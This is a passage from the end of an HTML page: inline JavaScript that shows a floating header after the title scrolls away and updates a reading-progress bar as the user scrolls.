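            var lastWindowHeight = window.innerHeight;
            var lastDocumentHeight = $(document).height();
            var ticking = false;

            function onScroll() {
                lastScrollY = window.scrollY;
                requestTick();
            }

            function onResize() {
                lastWindowHeight = window.innerHeight;
                lastDocumentHeight = $(document).height();
                requestTick();
            }

            // Schedule a single update() for the next frame; further calls
            // before it runs are no-ops.
            function requestTick() {
                if (!ticking) {
                    requestAnimationFrame(update);
                }
                ticking = true;
            }

            function update() {
                // Absolute page offset of the title; the floating header is
                // shown once the title plus a 35px margin has scrolled away.
                var trigger = title.getBoundingClientRect().top + window.scrollY;
                var triggerOffset = title.offsetHeight + 35;
                var progressMax = lastDocumentHeight - lastWindowHeight;

                // show/hide floating header
                if (lastScrollY >= trigger + triggerOffset) {
                    header.classList.add('floating-active');
                } else {
                    header.classList.remove('floating-active');
                }

                progressBar.setAttribute('max', progressMax);
                progressBar.setAttribute('value', lastScrollY);

                ticking = false;
            }

            window.addEventListener('scroll', onScroll, { passive: true });
            window.addEventListener('resize', onResize, false);

            // Initial paint so the header/progress state is right before the
            // first scroll event.
            update();

        });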
    </script>


    

</body>
</html>
